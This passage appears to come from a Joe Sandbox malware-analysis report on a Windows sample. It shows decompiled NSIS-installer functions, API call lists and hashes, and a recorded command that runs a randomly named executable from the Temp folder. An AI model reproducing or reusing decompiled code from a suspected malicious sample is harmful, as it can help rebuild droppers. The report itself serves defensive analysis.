                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: XgB
                                  • API String ID: 2295610775-796949446
                                  • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                  • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                  • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                  • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 141 403f64-403f76 142 403f7c-403f82 141->142 143 4040dd-4040ec 141->143 142->143 146 403f88-403f91 142->146 144 40413b-404150 143->144 145 4040ee-404129 GetDlgItem * 2 call 404463 KiUserCallbackDispatcher call 40140b 143->145 148 404190-404195 call 4044af 144->148 149 404152-404155 144->149 167 40412e-404136 145->167 150 403f93-403fa0 SetWindowPos 146->150 151 403fa6-403fad 146->151 165 40419a-4041b5 148->165 153 404157-404162 call 401389 149->153 154 404188-40418a 149->154 150->151 156 403ff1-403ff7 151->156 157 403faf-403fc9 ShowWindow 151->157 153->154 181 404164-404183 SendMessageW 153->181 154->148 164 404430 154->164 161 404010-404013 156->161 162 403ff9-40400b DestroyWindow 156->162 158 4040ca-4040d8 call 4044ca 157->158 159 403fcf-403fe2 GetWindowLongW 157->159 169 404432-404439 158->169 159->158 166 403fe8-403feb ShowWindow 159->166 170 404015-404021 SetWindowLongW 161->170 171 404026-40402c 161->171 168 40440d-404413 162->168 164->169 174 4041b7-4041b9 call 40140b 165->174 175 4041be-4041c4 165->175 166->156 167->144 168->164 177 404415-40441b 168->177 170->169 171->158 180 404032-404041 GetDlgItem 171->180 174->175 178 4041ca-4041d5 175->178 179 4043ee-404407 DestroyWindow EndDialog 175->179 177->164 183 40441d-404426 ShowWindow 177->183 178->179 184 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 178->184 179->168 185 404060-404063 180->185 186 404043-40405a SendMessageW IsWindowEnabled 180->186 181->169 183->164 213 404232-40426e ShowWindow EnableWindow call 404485 EnableWindow 184->213 214 40422a-40422f 184->214 188 404065-404066 185->188 189 404068-40406b 185->189 186->164 186->185 191 404096-40409b call 40443c 188->191 192 404079-40407e 189->192 193 40406d-404073 189->193 191->158 196 4040b4-4040c4 SendMessageW 192->196 198 404080-404086 192->198 193->196 197 404075-404077 193->197 196->158 197->191 199 404088-40408e call 40140b 198->199 200 40409d-4040a6 call 40140b 198->200 209 404094 
199->209 200->158 210 4040a8-4040b2 200->210 209->191 210->209 217 404270-404271 213->217 218 404273 213->218 214->213 219 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 4042a5-4042b6 SendMessageW 219->220 221 4042b8 219->221 222 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 220->222 221->222 222->165 233 404303-404305 222->233 233->165 234 40430b-40430f 233->234 235 404311-404317 234->235 236 40432e-404342 DestroyWindow 234->236 235->164 237 40431d-404323 235->237 236->168 238 404348-404375 CreateDialogParamW 236->238 237->165 239 404329 237->239 238->168 240 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 4043d4-4043ec ShowWindow call 4044af 240->245 245->168
                                  C-Code - Quality: 84%
                                  			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                  				struct HWND__* _v28;
                                  				void* _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				signed int _t38;
                                  				struct HWND__* _t48;
                                  				signed int _t67;
                                  				struct HWND__* _t73;
                                  				signed int _t86;
                                  				struct HWND__* _t91;
                                  				signed int _t99;
                                  				int _t103;
                                  				signed int _t117;
                                  				int _t118;
                                  				int _t122;
                                  				signed int _t124;
                                  				struct HWND__* _t127;
                                  				struct HWND__* _t128;
                                  				int _t129;
                                  				intOrPtr _t130;
                                  				long _t133;
                                  				int _t135;
                                  				int _t136;
                                  				void* _t137;
                                  				void* _t145;
                                  
                                  				_t130 = _a8;
                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                  					_t34 = _a12;
                                  					_t127 = _a4;
                                  					__eflags = _t130 - 0x110;
                                  					 *0x4236f0 = _t34;
                                  					if(_t130 == 0x110) {
                                  						 *0x42a228 = _t127;
                                  						 *0x423704 = GetDlgItem(_t127, 1);
                                  						_t91 = GetDlgItem(_t127, 2);
                                  						_push(0xffffffff);
                                  						_push(0x1c);
                                  						 *0x4216d0 = _t91;
                                  						E00404463(_t127);
                                  						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
                                  						 *0x4291ec = E0040140B(4);
                                  						_t34 = 1;
                                  						__eflags = 1;
                                  						 *0x4236f0 = 1;
                                  					}
                                  					_t124 =  *0x40a368; // 0x0
                                  					_t136 = 0;
                                  					_t133 = (_t124 << 6) +  *0x42a240;
                                  					__eflags = _t124;
                                  					if(_t124 < 0) {
                                  						L36:
                                  						E004044AF(0x40b);
                                  						while(1) {
                                  							_t36 =  *0x4236f0;
                                  							 *0x40a368 =  *0x40a368 + _t36;
                                  							_t133 = _t133 + (_t36 << 6);
                                  							_t38 =  *0x40a368; // 0x0
                                  							__eflags = _t38 -  *0x42a244;
                                  							if(_t38 ==  *0x42a244) {
                                  								E0040140B(1);
                                  							}
                                  							__eflags =  *0x4291ec - _t136;
                                  							if( *0x4291ec != _t136) {
                                  								break;
                                  							}
                                  							__eflags =  *0x40a368 -  *0x42a244; // 0x0
                                  							if(__eflags >= 0) {
                                  								break;
                                  							}
                                  							_t117 =  *(_t133 + 0x14);
                                  							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                  							_push(0xfffffc19);
                                  							E00404463(_t127);
                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                  							_push(0xfffffc1b);
                                  							E00404463(_t127);
                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                  							_push(0xfffffc1a);
                                  							E00404463(_t127);
                                  							_t48 = GetDlgItem(_t127, 3);
                                  							__eflags =  *0x42a2ac - _t136;
                                  							_v28 = _t48;
                                  							if( *0x42a2ac != _t136) {
                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                  								__eflags = _t117;
                                  							}
                                  							ShowWindow(_t48, _t117 & 0x00000008);
                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                  							E00404485(_t117 & 0x00000002);
                                  							_t118 = _t117 & 0x00000004;
                                  							EnableWindow( *0x4216d0, _t118);
                                  							__eflags = _t118 - _t136;
                                  							if(_t118 == _t136) {
                                  								_push(1);
                                  							} else {
                                  								_push(_t136);
                                  							}
                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                  							__eflags =  *0x42a2ac - _t136;
                                  							if( *0x42a2ac == _t136) {
                                  								_push( *0x423704);
                                  							} else {
                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                  								_push( *0x4216d0);
                                  							}
                                  							E00404498();
                                  							E00406507(0x423708, E00403F45());
                                  							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
                                  							SetWindowTextW(_t127, 0x423708);
                                  							_push(_t136);
                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                  							__eflags = _t67;
                                  							if(_t67 != 0) {
                                  								continue;
                                  							} else {
                                  								__eflags =  *_t133 - _t136;
                                  								if( *_t133 == _t136) {
                                  									continue;
                                  								}
                                  								__eflags =  *(_t133 + 4) - 5;
                                  								if( *(_t133 + 4) != 5) {
                                  									DestroyWindow( *0x4291f8);
                                  									 *0x4226e0 = _t133;
                                  									__eflags =  *_t133 - _t136;
                                  									if( *_t133 <= _t136) {
                                  										goto L60;
                                  									}
                                  									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "\"F@"), _t133);
                                  									__eflags = _t73 - _t136;
                                  									 *0x4291f8 = _t73;
                                  									if(_t73 == _t136) {
                                  										goto L60;
                                  									}
                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                  									_push(6);
                                  									E00404463(_t73);
                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                  									ScreenToClient(_t127, _t137 + 0x10);
                                  									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                  									_push(_t136);
                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                  									__eflags =  *0x4291ec - _t136;
                                  									if( *0x4291ec != _t136) {
                                  										goto L63;
                                  									}
                                  									ShowWindow( *0x4291f8, 8);
                                  									E004044AF(0x405);
                                  									goto L60;
                                  								}
                                  								__eflags =  *0x42a2ac - _t136;
                                  								if( *0x42a2ac != _t136) {
                                  									goto L63;
                                  								}
                                  								__eflags =  *0x42a2a0 - _t136;
                                  								if( *0x42a2a0 != _t136) {
                                  									continue;
                                  								}
                                  								goto L63;
                                  							}
                                  						}
                                  						DestroyWindow( *0x4291f8); // executed
                                  						 *0x42a228 = _t136;
                                  						EndDialog(_t127,  *0x421ed8);
                                  						goto L60;
                                  					} else {
                                  						__eflags = _t34 - 1;
                                  						if(_t34 != 1) {
                                  							L35:
                                  							__eflags =  *_t133 - _t136;
                                  							if( *_t133 == _t136) {
                                  								goto L63;
                                  							}
                                  							goto L36;
                                  						}
                                  						_push(0);
                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                  						__eflags = _t86;
                                  						if(_t86 == 0) {
                                  							goto L35;
                                  						}
                                  						SendMessageW( *0x4291f8, 0x40f, 0, 1);
                                  						__eflags =  *0x4291ec;
                                  						return 0 |  *0x4291ec == 0x00000000;
                                  					}
                                  				} else {
                                  					_t127 = _a4;
                                  					_t136 = 0;
                                  					if(_t130 == 0x47) {
                                  						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
                                  					}
                                  					_t122 = _a12;
                                  					if(_t130 != 5) {
                                  						L8:
                                  						if(_t130 != 0x40d) {
                                  							__eflags = _t130 - 0x11;
                                  							if(_t130 != 0x11) {
                                  								__eflags = _t130 - 0x111;
                                  								if(_t130 != 0x111) {
                                  									goto L28;
                                  								}
                                  								_t135 = _t122 & 0x0000ffff;
                                  								_t128 = GetDlgItem(_t127, _t135);
                                  								__eflags = _t128 - _t136;
                                  								if(_t128 == _t136) {
                                  									L15:
                                  									__eflags = _t135 - 1;
                                  									if(_t135 != 1) {
                                  										__eflags = _t135 - 3;
                                  										if(_t135 != 3) {
                                  											_t129 = 2;
                                  											__eflags = _t135 - _t129;
                                  											if(_t135 != _t129) {
                                  												L27:
                                  												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
                                  												goto L28;
                                  											}
                                  											__eflags =  *0x42a2ac - _t136;
                                  											if( *0x42a2ac == _t136) {
                                  												_t99 = E0040140B(3);
                                  												__eflags = _t99;
                                  												if(_t99 != 0) {
                                  													goto L28;
                                  												}
                                  												 *0x421ed8 = 1;
                                  												L23:
                                  												_push(0x78);
                                  												L24:
                                  												E0040443C();
                                  												goto L28;
                                  											}
                                  											E0040140B(_t129);
                                  											 *0x421ed8 = _t129;
                                  											goto L23;
                                  										}
                                  										__eflags =  *0x40a368 - _t136; // 0x0
                                  										if(__eflags <= 0) {
                                  											goto L27;
                                  										}
                                  										_push(0xffffffff);
                                  										goto L24;
                                  									}
                                  									_push(_t135);
                                  									goto L24;
                                  								}
                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                  								_t103 = IsWindowEnabled(_t128);
                                  								__eflags = _t103;
                                  								if(_t103 == 0) {
                                  									L63:
                                  									return 0;
                                  								}
                                  								goto L15;
                                  							}
                                  							SetWindowLongW(_t127, _t136, _t136);
                                  							return 1;
                                  						}
                                  						DestroyWindow( *0x4291f8);
                                  						 *0x4291f8 = _t122;
                                  						L60:
                                  						_t145 =  *0x425708 - _t136; // 0x0
                                  						if(_t145 == 0 &&  *0x4291f8 != _t136) {
                                  							ShowWindow(_t127, 0xa);
                                  							 *0x425708 = 1;
                                  						}
                                  						goto L63;
                                  					} else {
                                  						asm("sbb eax, eax");
                                  						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
                                  						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                  							L28:
                                  							return E004044CA(_a8, _t122, _a16);
                                  						} else {
                                  							ShowWindow(_t127, 4);
                                  							goto L8;
                                  						}
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                  • ShowWindow.USER32(?), ref: 00403FC0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                  • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                  • DestroyWindow.USER32 ref: 00403FFF
                                  • SetWindowLongW.USER32 ref: 00404018
                                  • GetDlgItem.USER32 ref: 00404037
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                  • IsWindowEnabled.USER32(00000000), ref: 00404052
                                  • GetDlgItem.USER32 ref: 004040FD
                                  • GetDlgItem.USER32 ref: 00404107
                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                  • GetDlgItem.USER32 ref: 00404218
                                  • ShowWindow.USER32(00000000,?), ref: 00404239
                                  • EnableWindow.USER32(?,?), ref: 0040424B
                                  • EnableWindow.USER32(?,?), ref: 00404266
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                  • EnableMenuItem.USER32 ref: 00404283
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                  • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                  • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                  • ShowWindow.USER32(?,0000000A), ref: 00404420
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                  • String ID:
                                  • API String ID: 2475350683-0
                                  • Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                                  • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                  • Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                                  • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  [Control-flow graph of function 00403BB6; legend: Executed, Not Executed]
                                  C-Code - Quality: 96%
                                  			E00403BB6(void* __eflags) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t22;
                                  				void* _t30;
                                  				void* _t32;
                                  				int _t33;
                                  				void* _t36;
                                  				int _t39;
                                  				int _t40;
                                  				int _t44;
                                  				short _t63;
                                  				WCHAR* _t65;
                                  				signed char _t69;
                                  				signed short _t73;
                                  				WCHAR* _t76;
                                  				intOrPtr _t82;
                                  				WCHAR* _t87;
                                  
                                  				_t82 =  *0x42a230;
                                  				_t22 = E004068D4(2);
                                  				_t90 = _t22;
                                  				if(_t22 == 0) {
                                  					_t76 = 0x423708;
                                  					L"1033" = 0x30;
                                  					 *0x437002 = 0x78;
                                  					 *0x437004 = 0;
                                  					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
                                  					__eflags =  *0x423708;
                                  					if(__eflags == 0) {
                                  						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
                                  					}
                                  					lstrcatW(L"1033", _t76);
                                  				} else {
                                  					_t73 =  *_t22(); // executed
                                  					E0040644E(L"1033", _t73 & 0x0000ffff);
                                  				}
                                  				E00403E8C(_t78, _t90);
                                  				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                                  				 *0x42a2a0 =  *0x42a238 & 0x00000020;
                                  				 *0x42a2bc = 0x10000;
                                  				if(E00405EDE(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                  					L16:
                                  					if(E00405EDE(_t98, _t86) == 0) {
                                  						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                  					}
                                  					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
                                  					 *0x429208 = _t30;
                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                  						L21:
                                  						if(E0040140B(0) == 0) {
                                  							_t32 = E00403E8C(_t78, __eflags);
                                  							__eflags =  *0x42a2c0;
                                  							if( *0x42a2c0 != 0) {
                                  								_t33 = E0040563C(_t32, 0);
                                  								__eflags = _t33;
                                  								if(_t33 == 0) {
                                  									E0040140B(1);
                                  									goto L33;
                                  								}
                                  								__eflags =  *0x4291ec;
                                  								if( *0x4291ec == 0) {
                                  									E0040140B(2);
                                  								}
                                  								goto L22;
                                  							}
                                  							ShowWindow( *0x4236e8, 5); // executed
                                  							_t39 = E00406864("RichEd20"); // executed
                                  							__eflags = _t39;
                                  							if(_t39 == 0) {
                                  								E00406864("RichEd32");
                                  							}
                                  							_t87 = L"RichEdit20W";
                                  							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
                                  							__eflags = _t40;
                                  							if(_t40 == 0) {
                                  								GetClassInfoW(0, L"RichEdit", 0x4291c0);
                                  								 *0x4291e4 = _t87;
                                  								RegisterClassW(0x4291c0);
                                  							}
                                  							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
                                  							E00403B06(E0040140B(5), 1);
                                  							return _t44;
                                  						}
                                  						L22:
                                  						_t36 = 2;
                                  						return _t36;
                                  					} else {
                                  						_t78 =  *0x42a220;
                                  						 *0x4291c4 = E00401000;
                                  						 *0x4291d0 =  *0x42a220;
                                  						 *0x4291d4 = _t30;
                                  						 *0x4291e4 = 0x40a380;
                                  						if(RegisterClassW(0x4291c0) == 0) {
                                  							L33:
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                  						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
                                  						goto L21;
                                  					}
                                  				} else {
                                  					_t78 =  *(_t82 + 0x48);
                                  					_t92 = _t78;
                                  					if(_t78 == 0) {
                                  						goto L16;
                                  					}
                                  					_t76 = 0x4281c0;
                                  					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
                                  					_t63 =  *0x4281c0; // 0x43
                                  					if(_t63 == 0) {
                                  						goto L16;
                                  					}
                                  					if(_t63 == 0x22) {
                                  						_t76 = 0x4281c2;
                                  						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
                                  					}
                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                  						L15:
                                  						E00406507(_t86, E00405DD6(_t76));
                                  						goto L16;
                                  					} else {
                                  						_t69 = GetFileAttributesW(_t76);
                                  						if(_t69 == 0xffffffff) {
                                  							L14:
                                  							E00405E22(_t76);
                                  							goto L15;
                                  						}
                                  						_t98 = _t69 & 0x00000010;
                                  						if((_t69 & 0x00000010) != 0) {
                                  							goto L15;
                                  						}
                                  						goto L14;
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                    • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                                    • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                  • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,7620FAA0), ref: 00403CB7
                                  • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,00000000,?), ref: 00403CD5
                                  • LoadImageW.USER32 ref: 00403D1E
                                  • RegisterClassW.USER32 ref: 00403D5B
                                  • SystemParametersInfoW.USER32 ref: 00403D73
                                  • CreateWindowExW.USER32 ref: 00403DA8
                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                  • GetClassInfoW.USER32 ref: 00403E0A
                                  • GetClassInfoW.USER32 ref: 00403E17
                                  • RegisterClassW.USER32 ref: 00403E20
                                  • DialogBoxParamW.USER32 ref: 00403E3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 606308-1548620822
                                  • Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                                  • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                  • Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                                  • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  [Control-flow graph for the function at 0x0040307D; legend: Executed, Not Executed]
                                  C-Code - Quality: 78%
                                  			E0040307D(void* __eflags, signed int _a4) {
                                  				DWORD* _v8;
                                  				DWORD* _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				signed int _v44;
                                  				long _t43;
                                  				long _t50;
                                  				void* _t53;
                                  				void* _t57;
                                  				intOrPtr* _t59;
                                  				long _t60;
                                  				long _t70;
                                  				signed int _t77;
                                  				intOrPtr _t80;
                                  				long _t82;
                                  				void* _t85;
                                  				signed int _t87;
                                  				void* _t89;
                                  				long _t90;
                                  				long _t93;
                                  				void* _t94;
                                  
                                  				_t82 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_t43 = GetTickCount();
                                  				_t91 = L"C:\\Users\\hardz\\Desktop\\4505682666.exe";
                                  				 *0x42a22c = _t43 + 0x3e8;
                                  				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\4505682666.exe", 0x400);
                                  				_t89 = E00405FF7(_t91, 0x80000000, 3);
                                  				_v16 = _t89;
                                  				 *0x40a018 = _t89;
                                  				if(_t89 == 0xffffffff) {
                                  					return L"Error launching installer";
                                  				}
                                  				E00406507(0x436800, _t91);
                                  				E00406507(0x439000, E00405E22(0x436800));
                                  				_t50 = GetFileSize(_t89, 0);
                                  				 *0x420ec4 = _t50;
                                  				_t93 = _t50;
                                  				if(_t50 <= 0) {
                                  					L24:
                                  					E00403019(1);
                                  					if( *0x42a234 == _t82) {
                                  						goto L29;
                                  					}
                                  					if(_v8 == _t82) {
                                  						L28:
                                  						_t34 =  &_v24; // 0x403847
                                  						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                  						_t94 = _t53;
                                  						E004034AF( *0x42a234 + 0x1c);
                                  						_t35 =  &_v24; // 0x403847
                                  						_push( *_t35);
                                  						_push(_t94);
                                  						_push(_t82);
                                  						_push(0xffffffff); // executed
                                  						_t57 = E004032B4(); // executed
                                  						if(_t57 == _v24) {
                                  							 *0x42a230 = _t94;
                                  							 *0x42a238 =  *_t94;
                                  							if((_v44 & 0x00000001) != 0) {
                                  								 *0x42a23c =  *0x42a23c + 1;
                                  							}
                                  							_t40 = _t94 + 0x44; // 0x44
                                  							_t59 = _t40;
                                  							_t85 = 8;
                                  							do {
                                  								_t59 = _t59 - 8;
